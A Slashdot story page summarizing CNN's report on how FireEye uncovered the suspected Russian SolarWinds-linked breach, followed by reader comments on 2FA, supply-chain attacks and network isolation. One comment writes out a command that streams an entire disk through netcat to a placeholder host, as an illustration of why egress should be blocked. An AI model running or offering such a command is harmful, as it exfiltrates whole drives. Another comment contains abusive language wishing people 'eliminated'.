Follow Slashdot stories on Twitter

 



Forgot your password?
typodupeerror
×
United States Government Security

'Unforced Error' in Suspected Russian Data Breach May Have Led to Its Discovery (cnn.com) 50

CNN reports: US officials and private sector experts investigating the massive data breach that has rocked Washington increasingly believe the attackers were ultimately discovered because they took a more aggressive "calculated risk" that led to a possible "unforced error" as they tried to expand their access within the network they had penetrated months earlier without detection, according to a US official and two sources familiar with the situation... FireEye was tipped off to the hackers' presence when they attempt to move laterally within the firm's network, according to the sources, a move that suggested the hackers were targeting sensitive data beyond emails addresses or business records.

Whether that exposure was the result of a mistake by the attackers or because they took a calculated risk remains unclear, the sources said. "At some point, you have to risk some level of exposure when you're going laterally to get after the things that you really want to get. And you're going to take calculated risks as an attacker," one source familiar with the investigation said...

Now, the hackers are attempting to salvage what access they can as the US government and private sector are "burning it all down," sources said, referring to their complete overhaul of networks, which will force the attackers to find new ways of getting the information they seek. Meanwhile, US officials continue to grapple with the fallout and assess just how successful the operation was, the US official said, noting that it is clear the nation-state responsible invested significant time and resources into the effort. While the scope of the hacking campaign remains unclear, government agencies that have disclosed they were impacted have said there is no evidence to date that classified data was compromised. But the way the hackers were discovered suggests the operation was intended to steal sensitive information beyond what was available on unclassified networks and sought to establish long-standing access to various targeted networks, the sources said.

The fact that FireEye — not the federal government — discovered the breach has also raised questions about why the attack went undetected at US government agencies.

The article also notes FireEye's acknowledgement that the breach "occurred when the hackers, who already had an employee's credentials, used those to register their own device to FireEye's multi-factor authentication system so they could receive the employee's unique access codes."
This discussion has been archived. No new comments can be posted.

'Unforced Error' in Suspected Russian Data Breach May Have Led to Its Discovery

Comments Filter:
  • by kot-begemot-uk ( 6104030 ) on Saturday December 26, 2020 @12:51PM (#60867474) Homepage
    Looks like a well designed system if all the important stuff was behind 2FA.

    Sooner or later after hacking it, the attacker has a choice - to continue waiting for Godot or to try to get at any of the 2FA protected resources. They tried. The system logged it. They failed.

    This is VERY different from the Solar Winds clusterf*ck and I have absolutely no idea why they are mixed up in the same bag of sh*t. The Solar Winds clusterf*ck is about a totally idiotic, incompetent obsession which has engulfed the "security" part of the USA, NATO and their primary contractors overt the last few years.

    Single panes of glass and single click and point solutions (like Solar Winds Orion) are the mother of all backdoors. You hack it and it's game over (longer explanation off-site): https://www.fagain.co.uk/node/... [fagain.co.uk]

    IMHO, mixing them deliberately into a "single bag of sh*t" with the FireEye and other hacks is a deliberate attempt for a distraction by the architects of the "Total Information (Security) Awareness" sh*t sandwich which begot us Solar Winds Orion and the hack. Nope, did not work. Try harder and devise a better distraction next time.

    • by shanen ( 462549 ) on Saturday December 26, 2020 @01:45PM (#60867566) Homepage Journal

      Mod parent up (though I wish it were more clearly worded).

      My initial thought on this topic was whether any one individual is liable to catch the blame for exposing the operation. However on reading this comment, my reaction is modified so something along the lines of "Surely they must have had an internal discussion about whether or not to try it?"

      Been reading a lot of books on such topics. I think the only one that really had legs was Cyber War by Richard Clarke. High level perspective is still relevant after the ink dried. Main point is that China is the only major player with a balanced game of both offense and defense, which is especially important when relative vulnerabilities are considered. I'm not saying that the other books were bad, but there's a fundamental problem in that most cyber-security books are basically historical artifacts by the time the ink has dried. But if you can recommend a good book, then it's quite likely that I'll see if I can round up a copy. (Unless I've already read it, of course.) Just about to start (the peripherally related) Zucked even though I'm already pretty sure we already are.

    • Thanks for the link to the fagain site. His observations about the sequence of package-signing and delivery seem to be spot on. The hack had to be inserted before the signing.
      • The part that baffles me is why these networks with security-related info are on the internet, or have routes out. Why aren't there DMZs that have the updates, and relevant integrations between the various networks? If I mange to execute code on a machine (dd if=/dev/sda | nc 1.2.3.4 -p 1234), that should fail because these networks should not be allowed to talk to everything and anything on the internet. Intranet services, specific links to other networks they work with, and a DMZ that will deliver updates
        • It is because they are what is called, as a term of art, stupid dumb fucks. They do not know how to do Risk Assessments and have yet more stupid dumb fucks that install "updates" because "updates" without doing any Risk Assessment at all.

          All these stupid dumb fucks should be shown to the Welfare line or sent off as Cannon-fodder for the next shooting-war.

          The sooner they are eliminated the better off the world will be.

        • I suppose you don't know that anyone, including your cat, can get a Cybersecurity degree these days.

          Seriously, check your inbox (the spam folder): no doubt it is filled with offers from (small, accredited) University. The same way MBAs were offered by everyone a decade ago.

    • > a totally idiotic, incompetent obsession

      The obsession isn't idiotic and incompetent, the people behind it are.

      The PHB's want to be able to look at a source of truth they can understand so they aren't reliant on their underlings. It's the Culture of Power at work. Good managers, by contrast, are delighted to have hyper-competent employees and go to bat for them.

      This isn't to say that data fusion isn't useful but that's not what's being marketed to those who hold the budgets.

    • by jkroll ( 32063 )

      This is VERY different from the Solar Winds

      Actually it is not, FireEye is a Solar Winds customer and they are the ones that discovered the malware that was implanted in the Solar Winds Orion product when investigating this breach.

      It turns out that Solar Winds was compromised and the malware implanted in the Orion product back in 2019. So all the customers using Orion product were vulnerable to a supply chain attack when they installed subsequent patches from Solar Winds.

      What would be interesting to know is how Solar Winds missed the trojaned DLL in

      • by jkroll ( 32063 )

        Adding link to some of the analysis on the Solar Winds issue from Rapid7 [slashdot.org] that I forgot to include in the original response.

    • This is VERY different from the Solar Winds clusterf*ck and I have absolutely no idea why they are mixed up in the same bag of sh*t.

      You need to read the article, because you're just winging it.

      This is about how FireEye detected intruders on their network, which led to the discovery of the Solar Winds infiltration and hacked updates. If you have no idea how they're related, then you're being willfully ignorant, or dumb?

      The hackers got in with the hacked Solar Winds update, stole some employee creds, and they were discovered while attempting to register their own device with the MFA system. You are making it seem like the MFA auth itsel

  • by cats-paw ( 34890 ) on Saturday December 26, 2020 @02:12PM (#60867620) Homepage

    This is a really bad time to have a government full of Trumpian apparatchiks.

    There go-to reaction is going to be to lie about how bad it is.

  • when you're going laterally to get after the things that you really want to get.

    that sounds as if the stuff that the hackers did get (despite press reports about the severity of the leak) wasn't really very important.
    Either that, or they had tapped that source dry and had little to lose by going after more sensitive / better protected material.

    However, if that "better" material was also better protected - as the story suggests - then it does sound as if those higher levels of protection did actually do what they were supposed to.

    News about security breaches are always exaggerated.

  • When the Iranian counter intelligence rolled up CIA's entire penetration into their networks and also caught a few live spies who were doing the physical job of loading usbs. Seems like this foreign network is getting rolled up. We may even catch a few of their spies. Time for a spy exchange.
  • I post a sentence with three dots and get dinged because it "looks like ASCII art"

    ASCII art however is apparently perfectly fine and is posted no problem at all. We know it wasn't Slashdot's programmers that did the hack.

  • The fact that FireEye â" not the federal government â" discovered the breach has also raised questions about why the attack went undetected at US government agencies.

    lack of people to notice the problem? Lack of people who give a shit knowing that their job or agency is on the White House's hit list ? I think Trump has had some success at emptying govt agencies. One of the things he campaigned on.

  • Read the excellent recent Bruce Schneier article in The Guardian (https://www.theguardian.com/commentisfree/2020/dec/23/cyber-attack-us-security-protocols)

    He can't stress enough why focusing on offensive measures and strategies at the expense of defensive ones will certainly lead to disaster.

  • Boomer here skeptical of all the drumming into our heads “nation-state”!

    Vietnam body counts were also drummed into our tiny little brains. Thank you USA. Show your work like the US education system makes you do. Otherwise move-on. You got hacked.

     

A committee takes root and grows, it flowers, wilts and dies, scattering the seed from which other committees will bloom. -- Parkinson

Working...